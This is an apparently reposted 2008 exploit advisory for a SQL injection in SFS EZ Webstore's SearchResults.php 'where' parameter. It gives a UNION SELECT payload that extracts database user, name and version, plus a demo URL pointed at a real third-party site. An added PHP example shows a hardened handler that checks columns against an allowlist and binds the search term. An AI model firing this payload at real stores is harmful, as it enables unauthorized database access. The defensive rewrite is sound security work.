"The Devil Is the Voice Within; Lend an Ear to That Voice"

-Zorlu BUĞRAHAN-

Saturday, 1 November 2008

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6922

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]

[SQL]=

ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

demo

http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
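
The payload above begins with a column name (ItemDescription), which indicates that the where parameter is concatenated into the query as the column to search. A hardened search handler for that pattern follows as an added example; it is not code from SFS EZ Webstore or from the original post. The table name Items, the column ItemName and the function searchItems() are assumptions, and an in-memory SQLite database with constructed rows stands in for the store's database:

```php
<?php
// Added example: hypothetical hardened handler, not the vendor's code.
// Assumed names: table Items, column ItemName, function searchItems().

// Columns a visitor may search in. SQL identifiers cannot be bound as
// parameters, so the request value is only compared against this list.
const SEARCHABLE_COLUMNS = ['ItemDescription', 'ItemName'];

function searchItems(PDO $db, string $where, string $term): array
{
    // Strict comparison: only an exact, known column name is accepted.
    if (!in_array($where, SEARCHABLE_COLUMNS, true)) {
        throw new InvalidArgumentException('unsupported search field');
    }

    // The search term is data, so it is bound, never concatenated.
    // LIKE wildcards in the term are escaped with '!' to match literally.
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
    $stmt = $db->prepare(
        "SELECT ItemName, ItemDescription FROM Items
         WHERE $where LIKE :pattern ESCAPE '!'"
    );
    $stmt->execute([':pattern' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE Items (ItemName TEXT, ItemDescription TEXT)');
$db->exec("INSERT INTO Items VALUES ('Mug', 'Blue ceramic mug'),
                                    ('Cap', 'Red cotton cap')");

// Legitimate search on an allowed column.
print_r(searchItems($db, 'ItemDescription', 'ceramic'));

// A where value that is not an exact column name (constructed, shaped
// like the one in the advisory) is refused before any SQL is built.
try {
    searchItems($db, 'ItemDescription union select 1,2/*', 'ZoRLu');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Logging the rejected where values gives a cheap detection signal for probing of this parameter.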

